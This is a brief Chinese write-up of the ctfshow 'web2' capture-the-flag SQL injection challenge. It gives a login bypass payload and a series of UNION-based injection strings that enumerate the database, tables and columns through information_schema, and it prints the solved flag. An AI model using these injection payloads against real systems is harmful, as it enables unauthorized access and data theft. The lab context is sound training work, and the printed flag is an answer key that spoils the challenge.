ctfshow-web2

 

 根据题目的描述，可知此题为简单的SQL注入

 

 

输入用户名为 1'or 1=1#

密码为  1

发现回显   欢迎你，ctfshow

 

使用 联合查询找到回显位置

 

 

 

 

 

 发现回显位置在2的位置

构造语句查询数据库

1'union select 1,database(),3#

 

得到数据库名为 web2

 

 

 

 查表，构造语句

 1'union select null,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3#

或者  1'union select null,(select group_concat(table_name)),5 from information_schema.tables where table_schema='web2'#

 

 

 

 得到表名为 flag，uesr

查字段，构造语句

1'union select null,( select group_concat( column_name )),5 from information_schema.columns 

where table_name='flag'#

 

 

 

 得到字段flag

查询字段的内容 ,构造

1'union select 1,group_concat(flag),2 from flag#

 

 

 

 得到flag

ctfshow{2d433d36-4348-4f88-a7db-823858c97a95}